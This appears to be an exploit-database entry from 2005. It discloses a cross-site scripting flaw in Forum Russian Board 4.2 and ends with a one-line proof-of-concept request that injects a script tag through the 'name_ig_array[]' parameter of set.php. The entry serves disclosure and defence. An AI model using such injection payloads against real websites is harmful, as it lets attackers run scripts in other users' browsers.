CarLine Forum Russian Board 4.2 - 'set.php?name_ig_array[]' Cross-Site Scripting
| EKU-ID: 31216 | CVE: OSVDB-17490 | OSVDB-ID: |
| Author: 1dt.w0lf | Published: 2005-06-23 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 31216 | CVE: OSVDB-17490 | OSVDB-ID: |
| Author: 1dt.w0lf | Published: 2005-06-23 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/14045/info
Forum Russian Board is prone to multiple input validation vulnerabilities. These issues can allow attackers to carry out SQL Injection, cross-site scripting, and HTML injection attacks.
Forum Russian Board 4.2 is reported to be affected.
set.php?name_ig_array[]=<script>alert("XSS");</script>